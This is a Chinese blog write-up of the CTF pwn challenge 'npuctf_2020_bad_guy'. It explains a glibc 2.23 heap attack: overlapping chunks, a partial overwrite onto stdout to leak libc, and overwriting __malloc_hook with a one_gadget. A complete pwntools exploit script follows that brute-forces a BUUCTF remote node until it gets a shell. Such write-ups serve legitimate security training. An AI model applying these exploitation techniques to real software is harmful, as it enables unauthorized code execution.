npuctf_2020_bad_guy

最新推荐文章于 2022-10-23 16:05:10 发布
最新推荐文章于 2022-10-23 16:05:10 发布
阅读量506 收藏
点赞数 2
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123773034
版权

npuctf_2020_bad_guy

查看保护
在这里插入图片描述
在这里插入图片描述
edit可以改size。
攻击思路:没有show函数,利用unstortedbin打stdout泄露出libc。接着打fd为malloc_hook - 0x23,改malloc_hook为one_gadget即可。
1.肯定是需要unstortedbin的,所以我们可以这样构造,0x10 0x10 0x60,利用chunk0改chunk1size为0x91,这样的话chunk1和chunk2就被包住 了,在改chunk1 size的时候记得先释放一下chunk3
2.释放chunk3的原因是因为分割unstortedbin的时候让unstortedbin的fd和bk刚好落在chunk3的fastbin的fd和bk上
3.利用chunk3将堆块申请到stdout这里, 改write_base和flags输出libc。
4.再利用上面很相似的手法将堆块申请到malloc_hook - 0x23这里,改成one_gadget就可以了

from pwn import *

context(arch='amd64', os='linux')#log_level='debug')

file_name = './z1r0'


elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '>> '

def add(index, size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index :', str(index))
    r.sendlineafter('size: ', str(size))
    r.sendafter('Content:', content)

def edit(index, size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index :', str(index))
    r.sendlineafter('size: ', str(size))
    r.sendafter('content: ', content)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index :', str(index))

def attack():
    add(0, 0x10, 'aaaa')
    add(1, 0x10, 'aaaa')
    add(2, 0x60, 'bbbb')
    add(3, 0x10, 'ccc')

    delete(2)

    p1 = p64(0) * 3 + p64(0x91)
    edit(0, len(p1), p1)

    delete(1)

    add(4, 0x10, 'aaa')

    p2 = p64(0) * 3 + p64(0x71) + b'\xdd\x25'
    edit(4, len(p2), p2)

    add(5, 0x60, 'aaaa')

    p3 = b'a' * 3 + p64(0) * 6 + p64(0xfbad1880) + p64(0) * 3 + b'\x00'

    add(6, 0x60, p3)


    libc = ELF('./libc-2.23.so')

    libc_base = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 192 - libc.sym['_IO_2_1_stderr_']
    success('libc_base = ' + hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    success('malloc_hook = ' + hex(malloc_hook))

    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_gadget = one[3] + libc_base

    add(7, 0x60, 'aaa')

    delete(7)

    p4 = p64(0) * 3 + p64(0x71) + p64(malloc_hook - 0x23)
    edit(4, len(p4), p4)

    add(8, 0x60, 'aaa')

    p5 = b'a' * 0x13 + p64(one_gadget)
    add(9, 0x60, p5)

    r.sendlineafter(">> ", "1")
    r.sendlineafter("Index :", str(10))
    r.sendlineafter("size: ", str(0x10))

    r.interactive()

while True:
    try:
        r = remote('node4.buuoj.cn', 27229)
        attack()
        break
    except:
        r.close()
        continue
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nand_bbt.rar_BAD_bad block
09-23
Bad block table support for the NAND driver.
PWN】House of Roman
u014377094的博客
05-04 440
House of Orange 与 House of Pig先跳过,因为与io-file有关。 House of Roman用于 bypass ALSR,利用 12-bit 的爆破来达到获取 shell 的目的。且仅仅只需要一个 UAF 漏洞以及能创建任意大小的 chunk 的情况下就能完成利用。这个利用强大在不需要dump内容泄露unsorted bin的地址来获得基址,不过难受也难受在由于随机性,需要爆破。 核心步骤有三下 1.利用unsorted bin地址进行部分覆盖,利用fastbin at
IO_FILE(npuctf_2020_bad_guy)
csdn546229768的博客
03-24 397
是一道入门IO_FILE的题目 保护: 分析: Add: Edit: dele 思路 没有常见的off-by-null,和uaf,但是edit函数可以编辑任意大小的size,且最多malloc10次,edit4次 那么就可以利用堆重叠进行攻击 因为这题需要爆破,所以为了在本地便于调试所以关闭系统的地址随机化(不是永久的) 1.将chunk2放入到0x70fastbin,便于后面的修改fd指针指向__IO_2_1_stdout的上方处 malloc(0,0x10) malloc(1
BUUCTF-PWN刷题记录-17
weixin_44145820的博客
05-06 687
目录nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) 添加没有太大限制,但是会把之前内容清空 删除没有指针悬挂,并且没有show功能 edit有一个off-by-null 利用思路 因为本题的memset清0使得题目变得复杂了一点 进行4次a...
NPUCTF writeup
abtgu的博客
04-21 1666
抽象带师 题目: 题目描述:⭕????来????西北工✌️带❄️西踢莪????????赛????????⬆????➖单????????赛 大家笑一笑就好,flag格式NPUCTF{} 解题思路: 直接谐音读出意思,“欢迎来到西北工业大学CTF比赛世界上最简单的比赛”。 web????? 题目: 无 解题思路: 禁止浏览器禁用js即可查看源码,得到flag, flag{6c1e56dd-496e-4bd3-b3c1-1e2445f155e6} 这是什么觅????...
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4694
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
BUUCTF-pwn(12)
njh18790816639的博客
01-13 2861
[极客大挑战 2019]Not Bad orw类型,打开文件,读入内容,输出内容!但需要注意gadget! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './bad' r = remote('node4.buuoj.cn',29934) #r = process(binary) elf = ELF(binary) mnap = 0x123000 jmp_rsp = 0x0400a01 r.r
iOS内存错误EXC_BAD_ACCESS的解决方法
09-05
iOS开发,最郁闷的莫过于程序毫无征兆地就崩溃了,用bt命令打出调用栈,给出的是一堆系统EXC_BAD_ACCESS的信息,根本没办法定位问题出现在哪里
Remove Bad Point.rar_BAD_Remove bad point
09-23
对相邻点相差很小的一簇点集,找到变化突出的点并修正,起到使曲线平滑的作用。
SBB.rar_Banking Bad_SBB
09-19
just do banking system to see what is good or bad
to_catch_a_bad_guy
06-12
抓坏人 此应用程序是使用提供的 gem 生成的。 Rails Composer 是开源的,并得到订阅者的支持。 请加入 RailsApps 以支持 Rails Composer 的开发。问题? 问题? 需要帮忙? 使用标签“railsapps”在 Stack Overflow ...
BUU [NPUCTF2020]共 模 攻 击
MikeCoke的博客
10-07 1161
题目 hint 是共模攻击的老套路了,用扩展欧几里得算法就能解出来。 解出来得到的提示为:m.bit_length() < 400 task 这里放上大佬写的博客 链接 这里的 m2 - (c1 + c2)m + c1 * c2 = ijn ≡ 0 mod n 是通过公式化简,得到一个关于未知量 m 的多项式,然后用sage解多项式求根就能得到 flag 了。 我写的代码: from gmpy2 import* from libnum import* from sympy import*
NPUCTF 2020 Crypto writeup
Slightwind's Blog
04-24 3454
认清形势,建立信心 题目中给了 2e mod n2^e \ mod \ n2e mod n, 4e mod p4^e \ mod \ p4e mod p 和 8e mod p8^e \ mod \ p8e mod p。令它们分别为 ...
[NPUCTF2020]ezinclude
yym68686
10-17 2301
目录[NPUCTF2020]ezinclude方法一 利用php7 segment fault特性(CVE-2018-14884)方法二 利用 session.upload_progress 进行 session 文件包含 [NPUCTF2020]ezinclude 打开网页,查看源代码,发现注释提示: md5($secret.$name)===$pass 输入url: /?name=1 变化name的值,发现cookies的hash值在不断变化,说明hash值跟name的取值有关,但又不完全是name
[NPUCTF2020]共 模 攻 击
shshss64的博客
10-23 1454
数学分析
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 516
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
Crypto_[NPUCTF2020]共 模 攻 击
M3ng@L的博客
11-21 3333
[NPUCTF2020]共 模 攻 击 题目描述: hint文件: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getP
dns_probe_finished_bad_config
最新发布
03-16
"DNS_PROBE_FINISHED_BAD_CONFIG" 是一种常见的网络错误。这意味着无法连接到域名系统 (DNS) 服务器,导致无法访问网页。可能的原因包括:DNS服务器出现故障,网络连接问题,浏览器配置错误等。建议检查网络连接,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值